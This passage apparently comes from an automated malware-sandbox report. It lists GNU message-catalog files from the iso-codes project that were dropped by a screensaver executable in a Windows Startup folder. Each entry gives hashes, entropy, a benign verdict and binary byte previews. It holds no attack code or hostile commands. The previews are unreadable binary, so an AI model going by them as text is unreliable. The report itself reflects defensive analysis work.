                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:C+f02TTl/K0E0Cj2FJcCIgtDja8erq73NRZMkfmf:8Ely0E0/FVVtD+8e837Ztmf
                                                                                                    MD5:AD761DBBAC0E4F0927FB875C52841C84
                                                                                                    SHA1:2C88452A3845B7B30E224AE8AD47285DC1A74A9A
                                                                                                    SHA-256:DF8A62B8A3236F50A65D6654729D761D9D0E41D6D84ED6533CE1AB7BDE948083
                                                                                                    SHA-512:0C618267DC4A479A5088BB7F487491044B6EDBE3A6940DCF490EB319B7626092FFAA27B1B68E81DC9D3F52962756B0FFB1908F5F0E0D9A9772937203DCF94926
                                                                                                    Malicious:false
                                                                                                    Preview:........L.......|...e...........p.......q...............................................................................?.......R.......b.......r...................................!...............................%...*.......P.......c.......w.......................................................................4.......F.......Z.......l.......|...............................................................................8.......O.......o...............................................................................$.......;.......L.......].......o...............................................................................+.......:...$...!...%...F.......l...................%.......%.......(.......)...5......._...#...}...........%...................................7.......U...D...q...................$.......V...$.......{...........,..............."...........8...&...X...................&.......$...............%.......#...=.......a..................."......................."...........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 'Adlam'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10290
                                                                                                    Entropy (8bit):5.0461554772581385
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:dd0l3vxrYltU4WjV9qWxa5hW8fowV77QM3omfC0vWOE:YlZ8g4WjVDxa5hW8fowVYM3rC0v9E
                                                                                                    MD5:88EA602E2D427738F859251EF3016449
                                                                                                    SHA1:20CB7A1A17021B049F457B52BD60F63DD53165A1
                                                                                                    SHA-256:8E2BF4FA27926A2CD8C899812899DBC3EE33BEFF5B269DA5EEA737DEABD6382F
                                                                                                    SHA-512:F857909F9A769277D5BAD75FC4F79BF5EAC66647FF8AAAD71F724DF06F9B988B671C2CF9D089BFFD7B762F332A12872C07D993D3E977709F083828F147A76557
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23553
                                                                                                    Entropy (8bit):5.00391187760097
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosUm0dIFoGVvorh2p5Z46nbjz5wsWP48WAINiZG197E3B0bmJOLNINLJR:0oPm0aFoivorh2p5Z48fmsWP48WAIXep
                                                                                                    MD5:BE1D05AEAE528CBAA16B48111E2CC3AE
                                                                                                    SHA1:868C4083A1FA6497EA178877766D0012F2D4E858
                                                                                                    SHA-256:85DCCEA79D95E97415E31FD05364971A6CFE674055F61D12F90389BED71AD3B4
                                                                                                    SHA-512:FFEB77224807663B7C48F668D3C865CD38E8A191DF7EDACEB0567C274EFC895F9519B1AC29951B12CEE1F83BD369B7D1986B7174804F74278823EA44560F5122
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3741 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):158999
                                                                                                    Entropy (8bit):5.2483581712230745
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:lSD/wpv3r8y49s7nGa0WHHNAxddUt8/4g6ijD1xZVeadFFH85hwQg3c1:lSIrH427ntHh84g3jl85hXgU
                                                                                                    MD5:B1E77AB6E87A1F8C5D740A7AD0342945
                                                                                                    SHA1:27E67D3EFB1B6C85CF4A54C8B46AEEA0E1FFEF7F
                                                                                                    SHA-256:59CF516C043388BDC1444472DA34C644FED3A48551A0D142E9F29C1284452285
                                                                                                    SHA-512:2A79DEBE2B05164364A130D742AA3819FBEA46A7BA26C176E4FBA4B444BDED98D7487850E6D83728DFC87DBDCA5E95CCF9CC83D22B34DE09A41C167DA04CA47C
                                                                                                    Malicious:false
                                                                                                    Preview:.................u...............7.......7.......7.......7.......8.......8.......8......'8......,8......18......:8......?8......G8......P8......U8......]8......g8......l8......{8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......8.......9.......9......$9......09......69......D9......J9......W9......]9......f9......j9......q9......w9......}9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......9.......:.......:......%:......3:......<:......H:......Y:......n:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......:.......;.......;.......;......$;......3;......A;......Q;......\;......h;......r;......};.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......;.......<.......<.......<.......<......$<......4<......L<......Y<......g<......t<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<.......<......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 'Brittiska antarktiska territoriet'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2738
                                                                                                    Entropy (8bit):5.1599250258057285
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3UlE1p+vGqIfdvqN5CoUxXhre7NiwzB0JW+JReTqF4g:rLvlp+yaComhSpvqJemF4g
                                                                                                    MD5:ACFC279F23E2E67A32471A35BD425089
                                                                                                    SHA1:B1743EC4A5BA26733758D6612A9E12BA4D77824D
                                                                                                    SHA-256:6ED8EA56CCE18506676017B6B95EB9DA9379A66284E10D00EF15AD96004AF4B1
                                                                                                    SHA-512:06601F6F7BAD69A8F9CDEC91A50B0756CA4DC3DF6F1FE20B2CCA07DEECD6FDA2CC3A68DA223098C16D9F574A40F4282504A93ECD3AA463E32F35E54F9898699A
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................!...............................5.../.......e.......m...........................(...................................(.......5.......N.......Z... ...i..................................."....................... ...........3...0...>...0...o................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 175 messages, Project-Id-Version: iso_4217 'ADB-kontoenhet'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9466
                                                                                                    Entropy (8bit):4.965728524865174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:jwVUx73poFm6Dd1yK0v2LC/9nPdUF4mCJ:jwKx7mFdDXL0vUU9nP+F4mCJ
                                                                                                    MD5:141588DB41A3FD7D7C1FA9FA1481F184
                                                                                                    SHA1:304DDBAE041E6FC3D727652F868C07BE15215C14
                                                                                                    SHA-256:F52151D76359CDA93689B08CB6973EA1D5E535655779178243C42D0AFDBE4B88
                                                                                                    SHA-512:6AA5A84EE05E9A43C75BDEEDF6C4EBB382B8AA626C007858163DD31B5A5E75D3CD2955C636A32DB1566713189A9C65ECA4B35F6C664C2BCC5770A85E935BEADF
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................*.......:.......I.......N.......U.......e.......v...........................1.......3.......9.......7...Q.......................................................................................#...0...0.......a.......p......................................................................................................................./.......>.......P......._.......d.......{.......................................................................................................................&.......6.......F.......V.......[.......`.......n.......u.......z.......................................................................................................................!...............>.......Q.......W.......].......c.......r.......................................................................................".......).......3.......D.......R.......b.......k.......z...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9084 messages, Project-Id-Version: iso_639-3 ''Are'are'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):398696
                                                                                                    Entropy (8bit):5.261024147034073
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:RSnUONCLf6F7G6q7Q09KkW9J9zpoWgCpiSS0ZWYDgid6PpisEi8/pfn5xuF/C15q:xspoWg4D1DgiwBzEiQDf15UcZCJ
                                                                                                    MD5:8E7317C56525A25329B7435C87B19094
                                                                                                    SHA1:5CCC0FC89642353322E460BE970741E0071FECD9
                                                                                                    SHA-256:80D8DE04E5E3419C2E86FB18710D25D1829D25D74FE8519C532F1FD7ED7F3BAE
                                                                                                    SHA-512:04DCE54B6FA14A474F046DCAEC5705DC6AF791C5695AB52DEA5747F0D4823011DFCE181286146386700AED9BB289FEEBDB8B61DA3DC22F0CE1BD310E2098B3BE
                                                                                                    Malicious:false
                                                                                                    Preview:........|#..........Q/...7...... .......!.......*.......4.......9.......D.......I.......P.......V.......\.......h.......p.......u.......z.......................................................................................................................................................................*.......2.......9.......>.......F.......K.......T.......`.......o.......x.......~.......................................................................................................................................%.......3.......C.......Q.......Y......._.......f.......m.......r.......y............................................................................................................................................... .......$.......)...............B.......Z.......p.......~...............................................................................................!.......+.......5.......<.......H.......M.......U.......Z.......a.......g.......o.......v.......~...............
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 'Afroasiatiska spr\303\245k'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7469
                                                                                                    Entropy (8bit):4.9160562406844
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:XohhvFk/Dxi2EHAakW7fHolP2RSlSE0BfCuXr5VcJHVCBv2qBLIDjz0c:4SDx6HxkwolPPSE0BfNcaYqeHz5
                                                                                                    MD5:DE97E18E0E3A943B68FA7CB5B05CEB33
                                                                                                    SHA1:1CD5C73F409229B50FBCC064D003D19C0E8033B2
                                                                                                    SHA-256:C8ADBF2D067B52970F9C6146B9ADCD90DAF7CADEEA588B3C5C8B27F414A5FA15
                                                                                                    SHA-512:BE6860173FAB82B44CE9D5A126EAE91A4CBCBB68A166C83B932012434B4A9F55D7A70D393F85E9DD8394EBAC3F9465457103A63C3FAA2884DF2C2A4E9F3D900B
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#...........................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 168 messages, Project-Id-Version: iso_3166-1 'Afghanistani'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7984
                                                                                                    Entropy (8bit):4.796555065892604
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:THcIBhtQG9jryDAqTSFNRE6/ubTgANLmZRVad3Bz:IUcGtMAqqNd/ubDNIRwdxz
                                                                                                    MD5:18B106E679FC831A88A37E3A604C74CC
                                                                                                    SHA1:67730242DB6E9F40298F121F6A11DF6DECE237E1
                                                                                                    SHA-256:A6EA3901CAE385432B3D5BEFE1CB72B71DB2FA197C9CB66F44CF2171F7974881
                                                                                                    SHA-512:6140FF7E07D677983BB6B85286618A55B4682018D787E759B790327CD13FA7472B3D4B9DFBAACB148E8DE38DBE9FEDF188DCEABAE603D14319B225FA2245BE99
                                                                                                    Malicious:false
                                                                                                    Preview:................\...............(.......).......5.......=.......E.......T.......\.......c.......l.......w...............................................................................................................................................#.......+.......B.......K.......Y.......`.......r.......{...............................................................................................................0.......8.......>.......K.......V.......^.......c.......j.......y...............................................................................................................................)......./.......6.......>.......F.......L.......V.......].......g.......o.......z.......................................................................................................................................................!.......(......./.......:.......@.......S.......f.......x.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):456
                                                                                                    Entropy (8bit):5.2697268124881465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4T1xxjt02Ukuoa/aU5LLP3eXmBQWiR8A:RL5t0U1eaIOXmk
                                                                                                    MD5:B1DF1DD60CA188D8F2DC7DC96F384FD8
                                                                                                    SHA1:E07139AFE7906F684615D6AF4BE1D839AD6A2E32
                                                                                                    SHA-256:193CFCB4EF214E5E81DF4649EA135BA00BC196872AEDA20EA47B9FB30D3CDF9A
                                                                                                    SHA-512:D089BE9C960F262BE7F64964D6E4D06E87E97F2144DF61B344BF11F686BC64CCA31908E029973B0C5B4D4A7C8B99AE243C6E1FF059D24857B9BD26D9A34EB355
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2009-05-05 15:32+0200.Last-Translator: Muhsin Omar <mrfroasty@gmail.com>.Language-Team: Swahili <translation-team-sw@lists.sourceforge.net>.Language: sw.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.11.4..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 183 messages, Project-Id-Version: iso_15924 '\340\256\205\340\256\237\340\257\215\340\256\262\340\256\276\340\256\256\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):15455
                                                                                                    Entropy (8bit):4.995814981670657
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:4Wbyg4WjVDxa5hW8ShwMJqZ/eKUPpugtV+mUHMGRNtz851lAQqdT:4WbJDxa5I4T/4PpugtV+mUHlRNtQ5TAx
                                                                                                    MD5:517998847EFC71AF3129392030ABEB5D
                                                                                                    SHA1:43D1C73E78164AFCE91D4A901420FDC3A826E3B7
                                                                                                    SHA-256:C3E00E42C7B050ADA9AD8203A32C5E71BD21EF82BB590FF7F54B86D985991437
                                                                                                    SHA-512:097C96CF35739B6E35F01C0163250BAF06039AED78E71B7E6F3441FD17BD67ED579A7AF9BDBDFDB128CB11F8FF01855777F08F877E5AAAA5C76A472CF3A598E8
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\340\256\206\340\256\252\340\257\215\340\256\225\340\256\276\340\256\251\340\256\277\340\256\244\340\257\215\340\256\244\340\256\276\340\256\251\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35476
                                                                                                    Entropy (8bit):4.894857078112691
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0o/Pd45SAgS48fmsWP48WAIBEB+HIwVQz2CB/jHBXlJm0qe9HNpmob3+/o0ZNMpT:by5TgS48jEB+HIwVQSCB/jHBXlJm0qeP
                                                                                                    MD5:9DFC43465FF7EEB8FAEC21E9ABBADF49
                                                                                                    SHA1:FD69BF0DB276E26B25CE070DB2C683A523265E73
                                                                                                    SHA-256:2730DC2926E6726424F2A484CACFCA38CA2C954CBD0F8C25A83DEAD2C6C57C7D
                                                                                                    SHA-512:3C669FE3B5C2DB4BAF202868EA186D5A23AFAA2C69274A7115433DCB849020D858FF1B34B7C51E9A5633E43469721A29433262FAEF14F2427EB0703F9E5965FB
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.147683175233438
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGAXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITvXmBQWi9
                                                                                                    MD5:747B5E977C51C591B903A0DC9FE55A9F
                                                                                                    SHA1:052EFB663F3A923930503A21C5B6B46D94D10C37
                                                                                                    SHA-256:4BE3C6469C09D5283AAE9B36757B7802674D10FCFE23FB7B27B14D0598F95440
                                                                                                    SHA-512:466D50BCE296BA792740DF19CE8F661B1A22060306FFDD8470E554D6310B537FD4B0B08B498B3CDC9C39A46ED927F3BAC4695722EC40B9A49FE787C6C0A58CB3
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ta.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\340\256\252\340\257\215\340\256\260\340\256\277\340\256\237\340\257\215\340\256\237\340\256\277\340\256\232\340\257\215 \340\256\205\340\256\243\340\257\215\340\256\237\340\256\276\340\256\260\340\257\215\340\256\237\340\256\277\340\256\225\340\257\215 \340\256\252\340\256\277\340\256\260\340\256\244\340\257\207\340\256\232\340\256\256\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4343
                                                                                                    Entropy (8bit):5.0479516475563395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:rLvcar+yaCoIWFGyABNeUfUlCtUla9xBqnsyYFeVUFTGBH47U6Vsc/mglYDhn3q4:XcareFdrAB4crXvBK4FKBHaC/OwqjUN
                                                                                                    MD5:A6F1E4CFCE3DA42CC6B54F8285FA6A6B
                                                                                                    SHA1:82A9C0C31A15D67E20B7272D081FFFA4C96F269D
                                                                                                    SHA-256:70F2A8C5898F81957D3052B1B89E8ABB6C470B39233BD6762D25CCC6AB1A34D2
                                                                                                    SHA-512:ADB60B7031FC0D24767A438C4AAFAA0DCCD7742B150EFF9C29A35E0452B161105959C6EFE5538FDDCAA979F09F5CF5EAE22595095EF194EEF7CE0584F49B7781
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................Y.......Q...(...}...z...`...........Y...........8.......(...4...8...]...T...............S...t...T.......(.......(...F...=...o...(...............n.......>...t...m...........!...+...:...E...f...........8.../...f...h...........w.......i...a...+............... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\340\256\225\340\256\243\340\256\225\340\257\215\340\256\225\340\256\277\340\256\251\340\257\215 \340\256\217\340\256\237\340\256\277\340\256\252\340\256\277 \340\256\205\340\256\262\340\256\225\340\257\201'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14738
                                                                                                    Entropy (8bit):4.916289040002022
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:Sgn6TL0G/Uo/vPWZI2sllQVTEfOWDrV+JbrETp6y0LvmfmaAQW:Sgn8YAUoX9r2WD5+J/Ip30LvqmHQW
                                                                                                    MD5:AC08168A78C2DDAD25F9B1112E682B45
                                                                                                    SHA1:32379978E3FBF72B2CA622D9CF1BC77C25F0284D
                                                                                                    SHA-256:E80C06D5AB3B7A29052343BE109564EE94C9A563DC9528BD3A8A15A87AB79803
                                                                                                    SHA-512:FA7487C189404E08DC3B65CB0A4C60783B748D83FD354D000D40635D36C4B90EFF8B54C82F54CE4F3B4CEB3D2F3A9C0FFBF23B5D81DC5CBB8C6FB3EA0FBEF169
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 7229 messages, Project-Id-Version: iso_639-3 ''\340\256\206\340\256\260\340\257\215'\340\256\206\340\256\260\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):438885
                                                                                                    Entropy (8bit):5.127062959973817
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:U+hWOGux6YfP2LlixvGsb3lg1YdTrRHH2r/9HLEqy3hq3Lw:U+hLbNfOBKIy2xrpgUs
                                                                                                    MD5:AAF447D1CD24FC1E1A2187C2E16B3473
                                                                                                    SHA1:93072E18C87FFD2E7B286255E995E57C165D4E16
                                                                                                    SHA-256:48A85CAD01BBA40FAE79905F87D5009AFBF21B8D0AA4B840894B5801EEA02F1A
                                                                                                    SHA-512:BFC16ED1E41A976E3EBD25F145B793ABDF55D65A80BEA7A80CA109EA4C7EBCA067EC2E4001827E6FC39B331F155E885FCB0AE2E12D36D0C01ED697C884ECE598
                                                                                                    Malicious:false
                                                                                                    Preview:........=............%...........Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......Z.......[.......[.......[.......[.......[......)[......9[......I[......N[......S[......Y[......][......j[......o[......t[......y[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......[.......\.......\.......\......'\....../\......6\......<\......C\......G\......U\......]\......c\......j\......q\......v\......}\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......\.......].......].......]......!]......9]......O]......]]......m]......z].......].......].......].......].......].......].......].......].......].......].......].......^.......^.......^.......^.......^......&^......-^......5^......<^......B^......I^......O^......V^......c^......p^......v^......~^.......^.......^.......^.......^.......^.......^......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\340\256\206\340\256\252\340\257\215\340\256\252\340\256\277\340\256\260\340\256\225\340\257\215\340\256\225-\340\256\206\340\256\232\340\256\277\340\256\257 \340\256\256\340\257\212\340\256\264\340\256\277\340\256\225\340\256\263\340\257\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11658
                                                                                                    Entropy (8bit):4.826720665588928
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxVgI6x+3SE0BfNcaFpSxwrqgNhrxyjCLCryYRsjjygZ0Pt44uRnFYNg:XPrEnE0BfNcajCMnab8F6g
                                                                                                    MD5:E1CD082BCC25FB4797462DDB2EF0E7B7
                                                                                                    SHA1:10F37D54C19A5A1D13F22D46BA2F59CEDCF07833
                                                                                                    SHA-256:00D08681F6D8E05EE8BB762811B1D3A510C33F2424CFD4353AEC899B5655D2A5
                                                                                                    SHA-512:947ADB7C513CD762BB5D3DE27BE6734F30D89B46DBCD20AB708B46373948414DC01033F3E9A6187BCEC456E5135CBC414627343D9111BB5CE456A85D6265BBEB
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#.......................................>.......4...2.......g...+.......4...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: iso_3166-1 '\340\260\206\340\260\253\340\261\215\340\260\230\340\260\250\340\260\277\340\260\270\340\261\215\340\260\244\340\260\276\340\260\250\340\261\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35338
                                                                                                    Entropy (8bit):4.923080920521298
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:P5DKTgqsJc1KFJfRVjj5wsOP4XLAEOu3LOWVj3Nud1VuNLohYyCbdRs4Dgncc1EL:0XgzXmsOP4XLAEtoFQt5J1CMaPU4or3
                                                                                                    MD5:328F1621DF6B47E80611BD4EEF6F660D
                                                                                                    SHA1:9820A4F2D6015E0CF02DE1049B598A652ADACE70
                                                                                                    SHA-256:99C154CA7CD1F66F69380EC3421CF67A288DC0935B8D689E90FDF2EFF47B23BE
                                                                                                    SHA-512:9DB622CCA831E367EA5FA016719DAD05F743E7C5277358C0B8FA41B6E5215412B9AD4A8D69457955AA523C94936725A3F77EAC3EFD858ACB699577A9A1B61DA2
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".. ....".......".......".......#......"#......+#......9#......@#......_#......v#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......!$......*$......C$..,..._$.......$.......$..%....$.......$.......$.......$.......$.......$.......$.......$..%....%..,...0%.."...]%..*....%.......%.......%.......%.......%.......%.......%.......%.......&.......&...... &......(&......0&......9&......U&..'...c&..$....&.......&.......&.......&.......'......%'......*'......2'......9'......G'......X'......h'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(...... (.......(......5(......;(..!...W(......y(.......(.......(.......(..0...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
